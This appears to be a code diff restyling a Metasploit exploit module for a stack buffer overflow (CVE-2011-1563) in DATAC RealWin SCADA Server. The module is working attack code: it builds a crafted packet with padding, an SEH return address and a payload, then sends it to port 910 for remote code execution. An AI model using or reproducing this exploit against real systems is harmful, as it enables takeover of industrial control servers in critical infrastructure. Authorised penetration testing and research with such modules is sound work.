@@ -10,58 +10,62 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Seh
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
+        'Description' => %q{
           This module exploits a vulnerability found in DATAC Control International RealWin
-        SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
-        packet via port 910, RealWin will try to create a file (which would be saved to
-        C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
-        supplied filename with an inline memcpy routine without proper bounds checking, which
-        results a stack-based buffer overflow, allowing arbitrary remote code execution.
+          SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
+          packet via port 910, RealWin will try to create a file (which would be saved to
+          C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
+          supplied filename with an inline memcpy routine without proper bounds checking, which
+          results a stack-based buffer overflow, allowing arbitrary remote code execution.
 
-        Tested version: 2.0 (Build 6.1.8.10)
-      },
-      'Author'         => [ 'Luigi Auriemma', 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          Tested version: 2.0 (Build 6.1.8.10)
+        },
+        'Author' => [ 'Luigi Auriemma', 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2011-1563'],
           [ 'OSVDB', '72826'],
           [ 'BID', '46937'],
           [ 'URL', 'http://aluigi.altervista.org/adv/realwin_5-adv.txt' ],
           [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']
         ],
-      'Privileged'     => true,
-      'DefaultOptions' =>
-        {
+        'Privileged' => true,
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
         },
-      'Payload'        =>
-        {
-          'Space'    => 450,
+        'Payload' => {
+          'Space' => 450,
           'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
           'StackAdjustment' => -3500,
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           [ 'Universal', { 'Ret' => 0x4002da21 } ], # P/P/R FlexMLang.DLL 8.1.45.19
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2011-03-21'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2011-03-21',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([Opt::RPORT(910)])
   end
 
   def exploit
-
     connect
 
-    data =  [0x67542310].pack('V')
+    data = [0x67542310].pack('V')
     data << [0x00000824].pack('V')
     data << [0x00100001].pack('V')
-    data << [0x00000001].pack('V')  #Packet type
+    data << [0x00000001].pack('V') # Packet type
     data << [0x00060000].pack('V')
     data << [0x0000ffff].pack('V')
     data << rand_text_alpha_upper(221)
@@ -73,15 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Trying target #{target.name}...")
     sock.put(data)
-    select(nil,nil,nil,0.5)
+    select(nil, nil, nil, 0.5)
 
     handler
     disconnect
-
   end
 end
 
-
 =begin
 0:022> r
 eax=00000819 ebx=0587f89c ecx=00000039 edx=011fba04 esi=011fc138 edi=0587fffd
